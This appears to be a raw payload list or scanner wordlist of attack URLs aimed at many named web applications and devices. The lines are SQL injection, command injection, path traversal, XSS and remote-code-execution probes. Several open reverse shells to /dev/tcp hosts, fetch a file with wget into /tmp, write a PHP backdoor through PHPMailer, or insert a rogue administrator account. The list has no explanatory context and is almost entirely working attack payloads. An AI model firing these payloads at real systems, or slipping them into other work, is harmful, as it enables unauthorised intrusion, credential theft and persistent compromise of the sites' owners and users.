/appliancews/getLicense?hostName=$(/usr/bin/wget%20http://1.1.1.1:12345/file%20-O%20/tmp/dsifnfnfdwsFFS)
/cgi-bin/dna/viewAppletFsa.cgi?seqID=../../../../etc/passwd%00&Action=blast&hidenav=1
/cgi-bin/dna/viewAppletFsa.cgi?seqID=../../../../home/dna/spool/.pfile
/ping.cgi?IPAddr1=12&IPAddr3=12&IPAddr2=12&ping=Ping&IPAddr4=12&ping_IPAddr=12.12.12.12%3B+cat%20/etc/passwd
/ping.cgi?IPAddr1=12&IPAddr3=12&IPAddr2=12&ping=Ping&IPAddr4=12&ping_IPAddr=12.12.12.12%26+ls%20/etc/
/ossim/dashboard/sections/widgets/data/gauge.php?&type=alarm&wtype=blah&asset=1&height=1&value=a%3A1%3A%7Bs%3A4%3A%22type%22%3Bs%3A67%3A%22pass+from+users+INTO+OUTFILE+%27%2Ftmp%2F1.1.1.1_pass_tshark.pcap%27--+-%22%3B%7D
/cgi-bin/userConfig.cgi?func=cloudPersonalSmtp&sid=SIDVALUE&hash=`(echo;id;uname%20-a)>%262`
/cgi-bin/filemanager/utilRequest.cgi?func=cancel_trash_recovery&sid=SIDVALUE&pid=`id>/tmp/pwned`
/..//etc/passwd
/gadgets/definitions/uptime.CapacityWhatIfGadget/getmetrics.php?query_type=osperf-Mem&element=1%20AND%20SLEEP(5)
/gadgets/definitions/uptime.CapacityWhatifGadget/getxenmetrics.php?query_type=xenserverMem&time_frame=1&element=1%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))tayk)
/wizards/get2post.php?file_name=%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5ctest.txt
/search/members.json?id%60%3D-1%29%2f%2a%2a%2funion%2f%2a%2a%2fselect%2f%2a%2a%2f1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2Cuser%28%29%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%23balisong=1
/fiyo/dapur/apps/app_article/controller/article_list.php?cat='%20orsleep(10)%20or%20'1&user=&level=&sEcho=1&iColumns=7&sColumns=&iDisplayStart=0&iDisplayLength=10&mDataProp_0=0&mDataProp_1=1&mDataProp_2=2&mDataProp_3=3&mDataProp_4=4&mDataProp_5=5&mDataProp_6=6&sSearch=&bRegex=false&sSearch_0=&bRegex_0=false&bSearchable_0=true&sSearch_1=&bRegex_1=false&bSearchable_1=true&sSearch_2=&bRegex_2=false&bSearchable_2=true&sSearch_3=&bRegex_3=false&bSearchable_3=true&sSearch_4=&bRegex_4=false&bSearchable_4=true&sSearch_5=&bRegex_5=false&bSearchable_5=true&sSearch_6=&bRegex_6=false&bSearchable_6=true&iSortCol_0=0&sSortDir_0=asc&iSortingCols=1&bSortable_0=true&bSortable_1=true&bSortable_2=true&bSortable_3=true&bSortable_4=true&bSortable_5=true&bSortable_6=true&_=1500268118960
/fiyo/dapur/apps/app_article/controller/article_status.php?fp=1&id=1'or'1
/fiyo/dapur/apps/app_article/controller/comment_status.php?stat=1&id=1'or'1
/fiyo/dapur/apps/app_comment/controller/comment_status.php?stat=1&id=1'or'1
/DesktopModules/C_Info/WebService/C_InfoService.asmx?SOAPAction:%20"https://tempuri.org/GetArticleHitsArray"%20<?xml%20version="1.0"%20encoding="utf-8"?>%20<soap:Envelope%20xmlns:xsi="https://www.w3.org/2001/XMLSchema-instance"%20xmlns:xsd="https://www.w3.org/2001/XMLSchema"%20xmlns:soap="https://schemas.xmlsoap.org/soap/envelope/">%20<soap:Body>%20<GetArticleHitsArray%20xmlns="https://tempuri.org/">%20<ArticleIDs>aaa’</ArticleIDs>%20</GetArticleHitsArray>%20</soap:Body>%20</soap:Envelope>
/api/saveconfig?key=__import__(%27os%27).system(%27touch%20%2Ftmp%2Fpy100%20%26%27)&value=10&_=1496061368064
/wordpress/wp-admin/admin.php?page=SpiderCalendar&%20search_events_by_title=&page_number=1&serch_or_not=&nonce_sp_cal=1e91ab0f6b&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fadmin.php%3Fpage%3DSpiderCalendar&id_for_playlist=&asc_or_desc=1&order_by=id%2c(select*from(select(sleep(2)))a)
/wordpress/wp-admin/admin.php?page=SpiderCalendar&search_events_by_title=&page_number=1&serch_or_not=&nonce_sp_cal=1e91ab0f6b&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fadmin.php%3Fpage%3DSpiderCalendar&id_for_playlist=&asc_or_desc=1&order_by=id%2c(select*from(select(sleep(30)))a)
/Embedded_Ace_Set_Task.cgi?$'5003'
/esbus/servlet/GetSQLData?SCHEMA=ESBUS_INTERNAL&TABLE=SCHEDULEDTASKS%20UNION%20ALL%20SELECT%201%20and%201=1&FIELD=LASTRUN&NOHEADER=1&SELECT=CLASS=com.esbus.appliance.SOD_PolicyCheck_SystemRun_TimerTask&OUT=XML
/set_mail.cgi?next_url=mail.htm&loginuse=admin&loginpas=%s&sender=a@a.com&receiver1=;telnetd$IFS-p4444$IFS-l/bin/sh&receiver2=&receiver3=&receiver4=&ssl=0&svr=smtp.google.com&smtpport=25&user=&pwd=
/wp-content/plugins/mail-masta/inc/lists/csvexport.php?list_id=0+OR+1%3D1&pl=/var/www/html/wordpress/wp-load.php
/wp-admin/admin.php?page=masta-lists&action=view_list&filter_list=0+OR+1%3D1
/wp-admin/admin-ajax.php?id=&action=my_action&url=%2Fvar%2Fwww%2Fhtml%2Fwp-content%2Fplugins%2Fmail-masta%2Finc%2Fcampaign_save.php&sender_selected_list_check=check&list_id=1+OR+1%3D1
/source_selector.php?controller=blog&action=showall&src=@random4d4c8bfba590f'%2b(select*from(select(sleep(2)))a)%2b'
/swms/ms.cgi?MSM_SID=<session_id>&MSM_MACRO_NAME=Show_Fatal_Error_Configuration|||a%20%23'%20|pwd||a%20%23|"%20|||a%20%23&MSM_MACRO_CATEGORY=%3CMSM_MACRO_CATEGORY%3E&PROGRAM=IO&MSM_MACRO_INPUT=-EXECUTE&Btn_Execute=Execute
/actionphp/action.input.php?&ActionForm=SendForm&TotalQuery=653&TotalCompiled=2&id=1`%20WHERE%20SLEEP(5)--%20aaa%20&idForm=1234567890
/actionphp/download.File.php?&file=../../../../../../etc/passwd
/subrion/actions.json?action=delete-file&item=members&itemid=1&field=emailor%20sleep(3)%20,username&file=123
/fiyo/apps/app_article/controller/editor.php?id="%20and%20sleep(10)&art_title=123
/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php?<?php%20echo(pi());
/commit2.cgi?ADMIN_PASSWD=$1$ZZ0DVlc6$QLqFLzW8YDZObgHtMZrYF/
/home/seos/courier/login.html?auth_params=x%0Dnew:header
/seos/1000/find.api?method=x%27%60id>/tmp/zz%60%27&oauth_token=b
/hitehat-fta.accellion.net/courier/1000@/index.html?auth=oauth&auth_params=asdf%22%3E%20%3Cimg%20src%3Dx%20onerror%3Dalert(%27alert%60xss%60%27)%2F%2F%3E
/gwadmin-console/install/login.jsp?token=asdf%22%2balert%28%27xss%27%29%2b%22
/responder.fcgi1?winid=106&winname=Users%20%26%20Groups&slot=1&mainslot=1
/responder.fcgi1?winid=109&winname=Users%20%26%20Groups&slot=1&mainslot=1
/responder.fcgi1?winid=103&winname=Users%20%26%20Groups&slot=1&mainslot=1
/responder.fcgi0?winid=89&winname=Users%20%26%20Groups&slot=0
/web/google_analytics.php?cmd=set&opt=cloud-device-num&arg=0|echo%20`id`%20%23
/_45b4a69e249c1d0ab9772763f3c97e69_/?s=login&o=/_45b4a69e249c1d0ab9772763f3c97e69_/%3fs%3dmain&action=submit&origin=%2F_45b4a69e249c1d0ab9772763f3c97e69_%2F%3Fs%3Dmain&s=login&user=admin%27+or+%271%27%3D%271+--%2B&password=asd
/FiyoCMS/dapur/apps/app_user/controller/status.php?stat=1&id=21+or+if(1,sleep(5),0)
/index.php?c=api&m=data2&auth=820686a208b89d4c2f8b6f2622eff83e&param=action=related%20module=news%20tag=1%20field=1%0aunion%0aselect%0auser()%23
/index.php?c=api&m=data2&auth=820686a208b89d4c2f8b6f2622eff83e&param=action=module%20form=1%20module=news%20field=1%0aunion%0aselect%0auser()%23
/index.php?c=api&m=data2&auth=202cb962ac59075b964b07152d234b70&param=action=form%20form=1%20field=1%0aunion%0aselect%0auser()%23
/index.php?c=api&m=data2&auth=202cb962ac59075b964b07152d234b70&param=action=member%20field=1%0aunion%0aselect%0auser()%23
/index.php?c=api&m=data2&auth=202cb962ac59075b964b07152d234b70&param=action=related%20catid=1%20tag=1,2%20num=1/**/PROCEDURE/**/analyse(extractvalue(rand(),concat(0x3a,version())),1)
/index.php?c=api&m=data2&auth=202cb962ac59075b964b07152d234b70&param=action=tags%20catid=1%20tag=1,2%20num=1/**/PROCEDURE/**/analyse(extractvalue(rand(),concat(0x3a,version())),1)
/index.php?c=weixin&m=sync&url=http://www.baidu.com
/fiyo/apps/app_comment/controller/insert.php?send=true&name=1"%20or%20sleep(10)%20or%20"1&email=aaa@qq.com&url=11&text=11111&captcha=undefined&link=%3Fapp%3Darticle%26view%3Ditem%26id%3D184
/fiyo/dapur/index.php?app=article&view=tag&act=edit&id=79&apply_tag=Simpan&id=79&name=1%22or%221&desc=1
/piwigo/admin.php?page=cat_options&section=status&cat_false%5B%5D=755&trueify=%C2%AB
/piwigo/admin.php?page=cat_options&section=comments?cat_true%5B%5D=7*55&falsify=%C2%BB
/piwigo/admin.php?page=cat_options&section=comments&cat_true%5B%5D=7*55&falsify=%C2%BB
/cgi-bin/HASync/hasync.cgi?debug=1&syncid=123%3Cscript%3Ealert%281%29%3C/script%3E
/websitebaker/account/preferences.php?action=details&display_name=24444'%20union%20select%20sleep(6)%23
/doli/theme/eldy/style.css.php?lang=de%27%20procedure%20analyse(extractvalue(rand()%2cconcat(concat(0x3a,CURRENT_USER())))%2c1)--%201
/theme/eldy/style.css.php?lang=de%27%3BINSERT%20INTO%20llx_user%20VALUES%20(424242%2C%200%2C%20NULL%2C%20NULL%2C%201%2C%200%2C%20%271984-01-01%2000%3A00%3A00%27%2C%20%271984-01-01%2000%3A00%3A00.000%27%2C%20NULL%2C%20NULL%2C%20%27newadmin%27%2C%20NULL%2C%20%2761529519452809720693702583126814%27%2C%20NULL%2C%20NULL%2C%20%27%27%2C%20NULL%2C%20%27SuperAdmin%27%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20NULL%2C%20NULL%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%201%2C%201%2C%201%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20%27%27%2C%20%272017-03-10%2000%3A00%3A00%27%2C%20%272017-03-10%2000%3A00%3A00%27%2C%20NULL%2C%20%27%27%2C%20NULL%2C%201%2C%20NULL%2C%20NULL%2C%20%27%27%2C%20NULL%2C%200%2C%20%27%27%2C%200%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL)%3B--%27
/doli/societe/list.php?sall=asd%3Cscript%3Ealert(%22xss%22)%3C%2Fscript%3E
/photostore/manager/mgr.login.php?pmode=recover_login&email=%27%201%20and%201=1
/zm/index.php?view=request&request=log&task=download&key=a9fef1f4&format=texty9fke%27%3Chtml%3E%3Chead%3E%3C/head%3E%3Cbody%3E%3Cscript%3Ealert(1)%3C%2fscript%3E%3C/body%3E%3C/html%3Eayn2h
/zm/index.php/LSE4%22%3E%3Cscript%3Ealert(1)%3C/script%3ELSE
/shop/api/easybill/easybillcsv.php?token=MODULE_EASYBILL_CSV_CRON_TOKEN&orders_status=-111'))or-sleep(5)/*&customers_status=*/%23
/shop/api/easybill/easybillcsv.php?token=MODULE_EASYBILL_CSV_CRON_TOKEN&orders_status=-111'))or(Select(case(36)when(ascii(substring(`customers_password`FROM(1)FOR(1))))then-sleep(5)End)from`customers`where`customers_id`=1)/*&customers_status=*/%23
/index.php?controller=address&action=activate_address&id=1%20and%20if(1,sleep(1),0)%23
/index.php?controller=blog&action=show&title=xx'%20union%20select1,user(),3,4,5,6,7,8,9,0,11,2,3,4,5,6,7,8,9,0%23
/index.php'%20OR%20SLEEP(1)--%20
/index.php'%20OR%20SLEEP(30)--%20
/genixcms0.0.8/index.php?page=modules&act=activate&token=I34jF0V6R1quEIS3kFBDsZfqyIuB1u8ywKvnUPB5LKS6uSntgHk6KYIR6R4T5Y9pXXtZtSBeCz1XW0tm&modules=aa%27%20and%20%28select%20*%20from%20%28select%28if%28ascii%28substr%28%28select%20user%28%29%29%2C1%2C1%29%29%3D114%2Csleep%282%29%2C0%29%29%29a%29%20or%20%27a%27%3D%27a
/GeniXCMS/register.php?activation=1'%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(version(),0x23,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%23
/GeniXCMS/?author=user1&type=hi%27%20OR%20(SELECT%201431%20FROM(SELECT%20COUNT(*),CONCAT((MID((IFNULL(CAST(CURRENT_USER()%20AS%20CHAR),0x20)),1,54)),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a)--%20bPMf
/mobiledoc/jsp/ccmr/clientPortal/admin/service/portalUserService.jsp?action=updatePersonalInfo&ufname=john&ulname=doe&upaddress=&upcity=&upstate=&zipcode=&uemail=john.doe@test.com';WAITFOR%20DELAY%20'0:0:5'--&upphone=0&umobileno=
/api/content/save/1?address1=e&address2=e&city=e&contactMe=false&email=sample%40email.tst&firstName=e&fund=Growth&ipAddress=127.0.0.1&lastName=e&state=e&stName=-1'%20OR%203_2_1=6%20AND%2000053=00053%20or%20'cFbN0pEu'='
/api/content/save/1?address1=e&address2=e&city=e&contactMe=false&email=sample@email.tst&firstName=e&fund=Growth&ipAddress=127.0.0.1&lastName=e&state=e&stName=RequestProspectus'%20AND%206745=6745%20AND%20'ajDn'='ajDn
/expComment/showComments/content_id/11%20or%20sleep(10)
/categoriesServlet?start=0&count=10&sort=keywords%20LIMIT%20(SELECT%20CASE%20WHEN%20(1=1)%20THEN%201%20ELSE%20-1%20END)
/categoriesServlet?start=0&count=10&sort=keywords%20LIMIT%20(SELECT%20CASE%20WHEN%20(1=0)%20THEN%201%20ELSE%20-1%20END)
/exponent/action=manage_ranks&controller=container&lastpage=http://8.8.8.8/exponent//exponent/&model=container&rerank%5b%5d=16&src=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/
/index.php?controller=pixidou&action=exitEditor&exitType=saveAsIs&fid=-1&apos;union%20select1,'./','evil.php',4,5,6,7,8,9,0,1,2,3,4,5%23&cpi=../../../../../../../../etc/passwd
/index.php?controller=pixidou&action=exitEditor&exitType=saveAsIs&fid=-1&apos;union%20select1,'./','1.txt',4,5,6,7,8,9,0,1,2,3,4,5%23&cpi=../../framework/conf/config.php
/modtask.php?action=confirmuser&userid=(select*from(select%20sleep(10))x)
/massmail.php?class=666&or=<(select*from(select%20sleep(10))x)%23
/wp-content/plugins/filedownload/download.php?path=http://www.google.com
/courier/B3dKe9sQaa0L.log
/UDDISecurityService/UDDISecurityImplBean?<SOAP-ENV:Envelope%20xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"%20xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"%20xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"%20xmlns:xsd="http://www.w3.org/2001/XMLSchema">%20<SOAP-ENV:Body>%20<m:deletePermissionById%20xmlns:m="http://sap.com/esi/uddi/ejb/security/">%20<permissionId>x'%20AND%201=(SELECT%20COUNT(*)%20FROM%20BC_UDV3_EL8EM_KEY)%20or%20'1'='1</permissionId>%20</m:deletePermissionById>%20</SOAP-ENV:Body>%20</SOAP-ENV:Envelope>
/ajax.cgi?action=tag_ipPing&pip=8.8.8.8%26echo%20test%20OS-Injection%26&cache=false&time=1498503087110
/simpleupload.py?$'returnpage=/&action=a&tns_appliance_session_token=61:62&tns_appliance_session_user=a"'%0abash%20-i%20>%26%20/dev/tcp/8.8.8.8/443%200>%261%0aecho%20'&
/cgi-bin/authLogin.cgi?reboot_notice_msg=$(printf%20'QNAPVJBD%08d%16s%20%2014`(echo;id)>&2`'%20$(expr%20$(date%20+%s)%20%%20100000000)%20Disconnect|base64|tr%20-d%20'rn')
/cgi-bin/diagnostics?tsrEmailCurrent=true&currentTSREmailTo=|date>/tmp/xort||a%20%23
/cgi-bin/diagnostics?tsrDeleteRestarted=true&tsrDeleteRestartedFile=|date>/tmp/xort2||a%20%23
/ping.cgi?DIA_IPADDRESS=8.8.8.8;cat%20/etc/passwd
/phpmailer/contact_form.php?action=send&msg=<?php%20sleep(3);%20system("/bin/bash%20-c%20'nohup%20bash%20-i%20>/dev/tcp/172.16.74.129/1337%200<&1%202>&1'%20");%20%20?>&name=Jas%20Fasola&email="attacker"%20-oQ/tmp/%20-Xupload/phpbackdoor3085.php%20"@email.com
/phpmailer/contact_form.php?action=send&msg=<?php%20phpinfo();%20?>&name=Jas%20Fasola&email="attacker"%20-oQ/tmp/%20-X/var/www/html/uploads/phpcode.php%20%20some"@email.com
/phpmailer/contact_form.php?action=send&msg=<?php%20sleep(3);%20system("/bin/bash%20-c%20'nohup%20bash%20-i%20>/dev/tcp/8.8.8.8/1337%200<&1%202>&1'%20");%20%20?>&name=Jas%20Fasola&email="attacker"%20-oQ/tmp/%20-Xupload/phpbackdoor3085.php%20"@email.com
/phpmailer/contact_form.php?action=send&msg=<?php%20sleep(3);%20system("/bin/bash%20-c%20'nohup%20bash%20-i%20>/dev/tcp/172.16.74.129/1337%200<&1%202>&1'%20");%20%20?>&name=Jas%20Fasola&email="attacker"%20-oQ/tmp/%20-Xupload/phpbackdoor3085.php%20"@email.com
/zikula4/jcss.php?f=..........userdatatmp.txt
/es/index.php?option=com_virtuemart&view=categorysearch%27+%2F+sleep%285%29+%2F+%27&task=smartSearch
/sources/item.query.php?type=action_on_quick_icon&id=(SELECT%20(CASE%20WHEN%20(6144=6144)%20THEN%206144%20ELSE%206144*(SELECT%206144%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS)%20END))&action=1
/sources/view.query.php?type=connections_logs&order=(SELECT%20(CASE%20WHEN%20(6688=6688)%20THEN%206688%20ELSE%206688*(SELECT%206688%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS)%20END))&direction=DESC
/sources/view.query.php?type=connections_logs&order=date%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))vhPw)&direction=DESC
/sources/view.query.php?type=errors_logs&order=date&direction=,%20%20(SELECT%20(CASE%20WHEN%20(1739=1739)%20THEN%201739%20ELSE%201739*(SELECT%201739%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS)%20END))
/yeager/y.php/tab_USERLIST?win_no=4&yg_id=2-user&yg_type=user&wid=wid_4&refresh=1&initload=&us=sess_16000&lh=325&pagedir_page=2&pagedir_perpage=1&pagedir_orderby=1%20and%201=1&pagedir_orderdir=4&pagedir_from=5&pagedir_limit=6,7&newRole=1
/ZCMS_1.1/ZCMS_1.1/?dir=editpost&p=1&title="<script>alert(1)</script>&content=<script>alert(1)</script>&author=<script>alert(1)</script>SATAN&visibility=1&type=1&comm=0
/ZCMS_1.1/ZCMS_1.1/index.jsp?dir=editpost&p=1&title=&content=&author=<script>alert(666)</script>&visibility=1&type=1&comm=0
/ZCMS_1.1/ZCMS_1.1/?dir=login&username=admin&pass=HELL'%20OR%20'2'='2
/cgit/blob/cgit.c?mimetype=text/html%0d%0a%0d%0a<script>xss</script>
/cgi-bin/dna/sysAdmin.cgi?$'investigator=&username=&navUserName=&investigator=&username=&executeCmdData=uname%20-a&Action=executeCmd'
/fosagent/repl/download-file?basedir=4&filepath=....Windowswin.ini
/wf-NAME/social/api/feed/aggregation/201803310000?ticket=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'%20IF(UNICODE(SUBSTRING((SELECT%20TOP%201%20ISNULL(CAST(name%20AS%20NVARCHAR(4000)),CHAR(32))%20FROM%20master..sysdatabases%20WHERE%20name%20NOT%20IN%20(SELECT%20TOP%207%20name%20FROM%20master..sysdatabases%20ORDER%20BY%20name)%20ORDER%20BY%20name),5,1))>104)%20WAITFOR%20DELAY%20'0:0:1'--%20qvAV&after=1523013041889&lang=de&_dc=1523013101769
/cgi-bin/CGIProxy.fcgi?cmd=asd&usr=asd&pwd=asd&remoteIp=`python%20-c%20"print%20('A'*266%20+%20'x9cx32')"`
/ladder/stats.php?game=W2BN&type=1&user=cat%20/etc/passwd
/ladder/stats.php?game=cat%20/etc/passwd&type=cat%20/etc/passwd&sortBy=username&sort_direction=cat%20/etc/passwd
/get_sec.php?q=1%20and%201=1
/index.php?option=com_socialpinboard&view=ajaxcontrol&tmpl=component&task=getlikeinfo&pin_id=1%20and%201=1&user_id=1%20and%201=1::/www/index.php?option=com_socialpinboard&view=gift&starts=100&ends=1%20and%201=1::/www/index.php?option=com_socialpinboard&view=home&category=1%20and%201=1::/www/index.php?option=com_socialpinboard&view=pindisplay&uid=1%20and%201=1::/www/index.php?option=com_socialpinboard&view=search&serachVal=1%20and%201=1::/www/index.php?option=com_socialpinboard&view=likes&uid=1%20and%201=1
/images//lists?cid=13%20)%20ORDER%20BY%201%20desc,extractvalue(rand(),concat(0x7c,database(),0x7c,user(),0x7c,@@version))%20desc%20--%20
/page1-%bf%bf"-page1/'%20AND%20(SELECT%207988%20FROM(SELECT%20COUNT(*),CONCAT(0x717a766a71,(SELECT(ELT(7988=7988,1))),0x71766b7071,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a)%20AND%20'WpDn'='WpDn
/api/sms_check.php?param=1%27and%20extractvalue(1,concat(0x7e,user()))%23
/index.php/community/?wpfd=0&wpfob=relevancy&wpfo=desc%2c(select*from(select(sleep(20)))a)&wpfs=fff&wpfin=entire-posts
/?page_id=2&eventyear=2015%20AND%201=1%20)--&dateset=on&eventday=1
/wordpress/wp-admin/admin.php?page=gallery_with_slideshow&val=view&gid=1%20and%201=1
/wordpress/wp-admin/edit.php?page=eventr%2Fattendees.php&event=1%20and%201=1
/wordpress/wp-admin/edit.php?page=eventr%2Fevent_form.php&event=1%20and%201=1&action=edit
/wordpress/wp-admin/edit.php?page=surveys%2Fsurvey_form.php&survey=1%20and%201=1&action=edit
/wordpress/wp-admin/edit.php?page=surveys%2Fquestion.php&survey=1%20and%201=1
/wordpress/wp-admin/admin.php?page=easy_team_manager_edit&id=1%20and%201=1
/wp-admin/admin.php?page=rk_user_lists&info=del&did=1%20and%201=1
/wp-admin/options-general.php?page=wordpress-gallery-transformation/gallery.php&picnj=1%20and%201=1
/wp-admin/upload.php?_wpnonce=daab7cfabf&action=delete&media%5B%5D=5%20%251%24%25s%20hello
/wordpress/wp-admin/admin.php?page=wpdevart_gallery_themes&task=add_edit_theme&id=-1+UNION+ALL+SELECT+NULL,@@VERSION,NULL,NULL--::/wordpress/wp-admin/admin.php?page=wpdevart_gallery_themes&task=add_edit_theme&id=1+and+1=0
/wp-admin/admin-ajax.php?action=ctimeline_frontend_get&timeline=1%20and%201=1
/topics/deletetopics.php?project=1'+and+(SELECT+SLEEP(5)+FROM+members+where+login+like+0x61646d696e+and+substr(password,1,1)+like+CHAR(116))+and+'2'='2::/topics/deletetopics.php?project=1&id=1+and+(SELECT+SLEEP(5)+FROM+members+where+login+like+0x61646d696e+and+substr(password,1,1)+like+CHAR(116))::/bookmarks/deletebookmarks.php?action=delete&id=select+sleep(5)+from+members+where+login+like+0x61646d696e+and+substr(password,1,1)+like+CHAR(116)::/calendar/deletecalendar.php?project=&action=delete&id=select+sleep(5)+from+members+where+login+like+0x61646d696e+and+substr(password,1,1)+like+CHAR(116)
/esiclivre/restrito/inc/lkpcep.php?q=AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5-(IF(ORD(MID((SELECT%20DISTINCT(HEX(IFNULL(CAST(schema_name%20AS%20CHAR),0x20)))%20FROM%20INFORMATION_SCHEMA.SCHEMATA%20LIMIT%2013,1),11,1))>1,0,5)))))oslN)--%20UACx
/recept.php?id=-1%20union%20select%20user()
/playlists.php?playlist='%20UNION%20SELECT%20null,concat(0x223c2f613e3c2f64%2069763e3c2f6469763e,version(),0%20x3c212d2d),null,null,null,null%20,null,null,null,null,null--%20-
/phpCollab-v2.5.1/newsdesk/newsdesk.php?action=show&id=1%20and%20ascii(substr(md5(1),1,1))=99&PHPSESSID=aoanbk4f8dl89trecdir46dq82
/index.php?option=com_tag&amp;task=tag&amp;tag=-`1%20and%201=1--
/category.php?id=1%20and%201=1::/www/author.php?id=1%20and%201=1
/index.php?cmd=agent&mod=true&ID=1%20and%201=1::/www/index.php?cmd=client_master&mod=true&ID=1%20and%201=1
/browse-scategory.php?sc=1%20and%201=1::/www/service-provider.php?ser=1%20and%201=1
/index.php?option=com_ns_downloadshop&amp;task=invoice.create&amp;id=1%20and%201=1
/index.php?option=com_zhyandexmap&amp;view=zhyandexmap&amp;tmpl=component&amp;id=3&amp;placemarklistid=1%20and%201=1
/admin/users/?sort=login&edit=1%20and%201=1::/www/admin/template/?edit=1%20and%201=1
/phpsqlsearch_genxml.php?subcategory=1%20and%201=1
/index.php?page=news&nid=1%20and%201=1
/viewprofile.php?profid=1%20and%201=1::/www/viewmessage.php?sender_id=1%20and%201=1
/admin/members_view.php?id=1%20and%201=1
/add_to_cart.php?product_id=1%20and%201=1
/admin/editadgroup.php?groupid=1%20and%201=1
/office_admin/?pid=95&action=print_charactercertificate&id=1%20and%201=1::/www/office_admin/?pid=95&action=edit&id=31%20and%201=1
/?photo=1%20and%201=1
/index.php?action=lookup-county&state=1%20and%201=1
/admin/admin_process.php?act=editpollform&id=1%20and%201=1::/www/admin/admin_process.php?act=cateditform&id=1%20and%201=1
/index.php?S=1%20and%201=1
/product_view1.php?pid=1%20and%201=1::/www/productcompanyinfo.php?id=1%20and%201=1
/rate.php?value=1%20and%201=1::/www/content.php?id=1%20and%201=1
/index.php?nice_theme=1%20and%201=1
/resources.php?action=category&sort=1%20and%201=1
/searchCommercial.php?property_type=1%20and%201=1&city=1%20and%201=1&posted_by=1%20and%201=1::/www/searchResidential.php?property_type=1%20and%201=1&city=1%20and%201=1&bedroom=1%20and%201=1
/status_list.php?status_id=1%20and%201=1
/restaurant-menu.php?resid=1%20and%201=1
/view/friend_profile.php?friend_type=Student&friend_index=1%20and%201=1
/single.php?id=1%20and%201=1
/listings.php?catid=1%20and%201=1::/www/ads-details.php?ID=1%20and%201=1
/show-flight-result.php?fl_orig=1%20and%201=1::/www/show-flight-result.php?fl_dest=1%20and%201=1::/www/pages.php?id=1%20and%201=1::/www/content.php?id=1%20and%201=1
/product.php?id=1%20and%201=1::/www/search.php?category_id=1&sub_category_id=1%20and%201=1::/www/search.php?category_id=1%20and%201=1
/searchJob.php?jobType=1%20and%201=1&jobFrequency=1%20and%201=1
/item_details.php?id=1%20and%201=1::/www/vendor_details.php?id=1%20and%201=1
/browse-category.php?cat=1%20and%201=1::/www/browse-scategory.php?sc=1%20and%201=1::/www/service-provider.php?ser=1%20and%201=1
/search_item.php?search=1%20and%201=1::/www/general_item_details.php?id=1%20and%201=1
/latest_news_details.php?id=1%20and%201=1
/profile.php?u=1%20and%201=1
/group.php?grid=1%20and%201=1::/www/profile.php?fid=1%20and%201=1::/www/company_details.php?id=1%20and%201=1
/itechd.php?productid=1%20and%201=1
/show-flight-result.php?&fl_orig=1%20and%201=1::/www/show-flight-result.php?fl_dest=1%20and%201=1
/Employer_Details.php?id=1%20and%201=1
/subpage.php?scat=1%20and%201=1::/www/message.php?pid=1%20and%201=1
/catcompany.php?token=1%20and%201=1::/www/buyleads-details.php?id=1%20and%201=1::/www/company/index.php?c=1%20and%201=1
/movie.php?f=1%20and%201=1::/www/tvshow.php?s=1%20and%201=1::/www/show_misc_video.php?id=1%20and%201=1
/browse-category.php?cat=1%20and%201=1::/www/browse-scategory.php?sc=1%20and%201=1
/single-cause.php?pid=1%20and%201=1
/search.php?cat_id=1%20and%201=1
/domain.php?id=1%20and%201=1
/list?gender=1%20and%201=1&main_search=::/www/list?city=1%20and%201=1&main_search=
/jobsearch_all.php?rid1=1%20and%201=1
/category_list.php?search=1%20and%201=1
/product-category.php?key=1%20and%201=1
/courselist.php?subcatid=1%20and%201=1::/www/courselist.php?popcourseid=1%20and%201=1
/product_details.php?id=1%20and%201=1
/service-list?city=1%20and%201=1&main_search=
/search-results.php?Projectmain=1%20and%201=1&search=::/www/search-results.php?proj_type=1%20and%201=1&search=::/www/search-results.php?searchtext=1%20and%201=1&search=::/www/search-results.php?sell_price=1%20and%201=1&search=::/www/search-results.php?maxprice=1%20and%201=1&search=::/www/search-results.php?maxprice=1%20and%201=1&search=
/booker_details.php?sourcebus=1%20and%201=1
/other-user-profile.php?id=1%20and%201=1
/list?city=1%20and%201=1&main_search=
/list?city=1%20and%201=1&main_search=
/service-list?city=1%20and%201=1&main_search=
/service_detail.php?pid=1%20and%201=1::/www/event_detail.php?eventid=1%20and%201=1::/www/news_detail.php?newid=1%20and%201=1
/list?city=1%20and%201=1&main_search=
/categories?subctid=1%20and%201=1::/www/categories?&mctid=1%20and%201=1
/jobdetails.php?pr_id=1%20and%201=1::/www/searchbycat_list.php?catid=1%20and%201=1
/list?city=1%20and%201=1&main_search=
/event-list?city=1%20and%201=1&main_search=
/quicksearch.php?q=1%20and%201=1
